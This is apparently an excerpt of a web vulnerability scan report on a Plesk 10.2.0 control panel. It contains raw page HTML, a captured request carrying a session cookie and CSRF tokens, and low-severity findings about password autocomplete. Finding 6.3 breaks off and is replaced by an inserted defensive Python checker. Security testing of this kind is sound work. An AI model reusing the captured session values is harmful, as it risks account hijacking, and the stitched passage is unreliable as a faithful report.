<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Personal FTP Repository Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository.properties/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The page contains a form with the following action URL:

/plesk/client@2/domain@1/odbc/dsn@1/properties/

The form contains the following password field with autocomplete enabled:

PWD, served as <input type="password" name="PWD" value="" > (neither the field nor its enclosing form carries autocomplete="off", so a browser or password manager may offer to store the ODBC login that is posted to the URL above).

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); 
return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL:

(empty: the form-user form is served with action="" and method="post", so it submits back to /smb/my-profile itself)

The form contains the following password fields with autocomplete enabled:
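The check behind findings 6.2 and 6.3 is mechanical: walk every form, find each input of type password, and report it unless the field or its enclosing form says autocomplete="off". The script below is an added example written for this page, not part of the XSS.CX report and not Plesk code. It uses only the Python standard library. The first sample is constructed from the ODBC DSN form served in 6.2 above, reduced to the inputs that matter; the hardened variant is an assumed fix, and the profile-form sample is modelled on the action="" form in 6.3 with assumed field names, since the visible excerpt does not show them.

```python
"""Find password fields that a browser may offer to remember.

Added example for findings 6.2 and 6.3; not from the report or from Plesk.
"""
from html.parser import HTMLParser


class PasswordAutocompleteChecker(HTMLParser):
    """Collect <input type="password"> fields not covered by autocomplete="off".

    The enclosing <form> is tracked so each finding can state the action URL
    the credential is posted to, and so a form-level autocomplete="off"
    (which applies to every field inside it) is honoured.
    """

    def __init__(self, page_url=None):
        super().__init__()
        self.page_url = page_url        # substituted when a form has action=""
        self.in_form = False
        self.form_action = None
        self.form_autocomplete = ""
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names; a valueless attribute
        # arrives as None, which we normalise to "".
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.in_form = True
            # An empty action means the form posts back to the page itself.
            self.form_action = a.get("action", "") or self.page_url or ""
            self.form_autocomplete = a.get("autocomplete", "").strip().lower()
        elif tag == "input" and a.get("type", "text").lower() == "password":
            own = a.get("autocomplete", "").strip().lower()
            effective = own or self.form_autocomplete
            if effective != "off":
                self.findings.append({
                    "form": self.form_action if self.in_form else None,
                    "field": a.get("name", ""),
                    "autocomplete": effective,
                })

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False
            self.form_action = None
            self.form_autocomplete = ""


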